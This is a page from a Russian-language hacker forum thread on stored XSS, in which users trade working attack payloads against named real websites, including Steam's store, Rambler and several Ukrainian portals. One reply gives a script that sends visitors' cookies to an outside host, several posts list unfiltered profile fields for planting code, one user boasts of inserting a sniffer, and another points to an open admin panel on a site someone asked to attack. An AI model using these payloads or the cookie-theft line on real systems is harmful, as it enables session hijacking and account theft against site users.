Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))
     
  2. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    BanQui,
    http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all
     
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Antimir.com.ua - какбы социалка+знакомства ;)

    При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес).

    Блок "Интересы":
    Ваши интересы=>и еще мне нравится=>кодес;
    Чем Вы займетесь в свободное время=>а также=>кодес;
    Занятия спортом=>другое=>кодес;
    Стили музыки=>другое=>кодес.


    Code:
    http://antimir.com.ua/~ligendo
     
  5. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    LiveInternet.ru

    При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество".

    Code:
    http://www.liveinternet.ru/users/ligendo/profile/
     
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    steampowered.com

    http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20diznt%27)%3C/script%3E

    http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XXS%20by%20diznt%27)%3C/script%3E

    http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript>

    XSS найдены мною лично... (думаю +++ поставите)
     
    #246 diznt, 27 Sep 2008
    Last edited: 27 Sep 2008
    2 people like this.
  7. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Х*й тебе на воротник а не + ...
    Ты различие между пассивками и активками видишь?
     
    2 people like this.
  8. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Точно извените,
    А нету спец раздела под пассивки?

    ПС что такие не адекваты то?
     
  9. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Мне пох*й :)
     
    1 person likes this.
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    mail.oboz.ua

    Не фильтруется тело(!) письма, в отличии от темы... :confused:
    Как в режиме текста, так и в html.

    uaportal.com

    "Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется :)

    Code:
    http://drevo.uaportal.com/userinfo/ligendo
     
  11. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    Просто смешно, написали свой форум с огромным кол-вом уязвимостей.
    dropzone.by парашютный форум, - настоящие экстрималы)))
    тут
     
    #251 procedure, 27 Sep 2008
    Last edited: 27 Sep 2008
  12. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    planeta.rambler.ru

    При просмотре профиля не фильтруется поле "Ник".

    Code:
    http://planeta.rambler.ru/users/nepoxek/
    http://planeta.rambler.ru/users/nepoxek/profile/
    
     
    1 person likes this.
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    [​IMG]

    http://dom2.ru/

    В комментарий можно вставить "><script>alert()</script>

    p.s. Собчак лошадь =\
     
    #253 Solide Snake, 30 Oct 2008
    Last edited: 30 Oct 2008
    1 person likes this.
  14. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    114
    Likes Received:
    28
    Reputations:
    -4
    [​IMG]

    WOW.RU

    Оффициальный русский сервер варкрафта

    вводим в поиск
    =))
     
    #254 FaR-G9, 7 Nov 2008
    Last edited: 7 Nov 2008
  15. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    это не активка =\
     
  16. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    тут тема для активных XSS, или ты разницу не рубишь? :(
     
    #256 diehard, 7 Nov 2008
    Last edited: 7 Nov 2008
    1 person likes this.
  17. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Это xss пассивная)))
    Если ты так рубишь,то должен знатть про xss post методом))
     
  18. зяблик

    зяблик New Member

    Joined:
    28 Oct 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
    http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?
     
  19. зяблик

    зяблик New Member

    Joined:
    28 Oct 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    -1
    может меня кто обрадует?
     
  20. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D
     
    1 person likes this.